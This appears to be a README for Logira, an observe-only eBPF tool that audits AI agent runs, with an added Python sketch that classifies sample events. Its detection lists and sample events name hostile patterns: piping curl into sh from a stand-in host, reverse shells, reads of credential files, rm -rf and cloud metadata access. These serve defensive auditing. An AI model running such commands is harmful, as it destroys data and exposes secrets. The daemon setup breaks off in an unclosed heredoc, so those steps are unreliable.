Logira: eBPF Runtime Auditing for AI Agent Runs

Logira is an eBPF-based runtime auditing tool for Linux that tracks what AI agents and automation actually do at the OS level. It records process execution, file activity, and network activity using cgroup v2 run-scoped tracking, attributing events to single audited runs.

Key Features
The tool provides per-run local storage in both JSONL and SQLite formats for timeline review and querying. It includes default detection rules focused on AI agent auditing, with optional custom YAML rules. Logira is observe-only by design: it records and detects but never blocks or enforces.

Default Detections
- Credential and secrets writes: ~/.ssh, ~/.aws, kube/gcloud/docker config, .netrc, .git-credentials, registry creds
- Sensitive credential reads: SSH private keys, AWS credentials/config, kubeconfig, docker config, .netrc, .git-credentials
- Persistence and config changes: writes under /etc, systemd units, cron, user autostart entries, shell startup files
- Temp droppers: executable files created under /tmp, /dev/shm, /var/tmp
- Suspicious exec patterns: curl|sh, wget|sh, tunneling/reverse shell tools and flags, base64 decode with shell hints
- Agent safety destructive patterns: rm -rf, git clean -fdx, find -delete, mkfs, terraform destroy, and similar commands
- Network egress: suspicious destination ports and cloud metadata endpoint access
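
Several of the detection categories above, sketched as a small classifier run over constructed events. This is an added example, not Logira's code or rule format: the event field names, the label names and the regexes are all assumptions made for illustration.

```python
import json
import re

# Constructed sample events; field names are assumptions, not Logira's JSONL schema.
SAMPLE_JSONL = """\
{"type":"file","op":"read","path":"/home/dev/.ssh/id_ed25519"}
{"type":"file","op":"write","path":"/home/dev/.aws/credentials"}
{"type":"file","op":"create","path":"/tmp/x.bin","mode":"0755"}
{"type":"exec","argv":["sh","-c","curl -fsSL http://example.invalid/i.sh | sh"]}
{"type":"exec","argv":["rm","-rf","/home/dev/project"]}
{"type":"net","dst_ip":"169.254.169.254","dst_port":80}
{"type":"file","op":"write","path":"/home/dev/project/README.md"}
"""

CRED = re.compile(r"/\.(ssh|aws)/|/\.kube/config$|/\.docker/config\.json$|/\.(netrc|git-credentials)$")
PERSIST = re.compile(r"^/etc/|/systemd/(system|user)/|^/var/spool/cron/|/\.config/autostart/|/\.(bashrc|bash_profile|profile|zshrc)$")
TEMP = re.compile(r"^/(tmp|dev/shm|var/tmp)/")
PIPE_SH = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba)?sh\b")
DESTRUCT = re.compile(r"\brm\s+-(rf|fr)\b|\bgit\s+clean\s+-fdx\b|\bfind\b.*\s-delete\b|\bmkfs\b|\bterraform\s+destroy\b")
METADATA_IP = "169.254.169.254"  # link-local cloud metadata address

def classify(ev):
    """Return the detection labels (hypothetical names) that one event triggers."""
    hits = []
    if ev.get("type") == "file":
        path, op = ev.get("path", ""), ev.get("op")
        if CRED.search(path):
            hits.append("credential_read" if op == "read" else "credential_write")
        if op != "read" and PERSIST.search(path):
            hits.append("persistence_change")
        if op == "create" and TEMP.match(path) and int(ev.get("mode", "0"), 8) & 0o111:
            hits.append("temp_dropper")  # new file in a temp dir with an execute bit set
    elif ev.get("type") == "exec":
        cmd = " ".join(ev.get("argv", []))
        if PIPE_SH.search(cmd):
            hits.append("pipe_to_shell")
        if DESTRUCT.search(cmd):
            hits.append("destructive_command")
    elif ev.get("type") == "net" and ev.get("dst_ip") == METADATA_IP:
        hits.append("metadata_endpoint")
    return hits

def audit(jsonl):
    """Classify each JSONL line; return (line_number, labels) for lines that hit."""
    rows = [(n, classify(json.loads(line))) for n, line in enumerate(jsonl.splitlines(), 1) if line.strip()]
    return [(n, hits) for n, hits in rows if hits]

if __name__ == "__main__":
    print(audit(SAMPLE_JSONL))
```

Because the result is a list of hits rather than a verdict, it matches the observe-only model: the ordinary write to README.md produces no entry, and nothing is blocked.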

Installation
Recommended installation via script:

curl -fsSL https://raw.githubusercontent.com/melonattacker/logira/main/install.sh | sudo bash

Or manual install from release tarball:

tar -xzf logira_vX.Y.Z_linux-<arch>.tar.gz
cd logira_vX.Y.Z_linux-<arch>
sudo ./install-local.sh

After installation or upgrade, restart the daemon:

sudo systemctl daemon-reload
sudo systemctl restart logirad.service
sudo systemctl status logirad.service --no-pager

How to Run
The root daemon logirad runs via systemd. Installation steps include:
# 1) Generate eBPF objects (only needed if missing)
make generate
# 2) Install the systemd unit
sudo install -D -m 0644 packaging/systemd/logirad.service /etc/systemd/system/logirad.service
# 3) Install the daemon binary (unit defaults to /usr/local/bin/logirad)
sudo install -m 0755 ./logirad /usr/local/bin/logirad
# 4) (Recommended) Point systemd at the eBPF .o files via an environment file
sudo mkdir -p /etc/logira
sudo tee /etc/logira/logirad.env > /dev/null << 'EOF'
LOGIRA_EXEC_BPF_OBJ=/absolute/path/to/collector/linux
Custom rules can be appended per-run with logira run --rules <file>.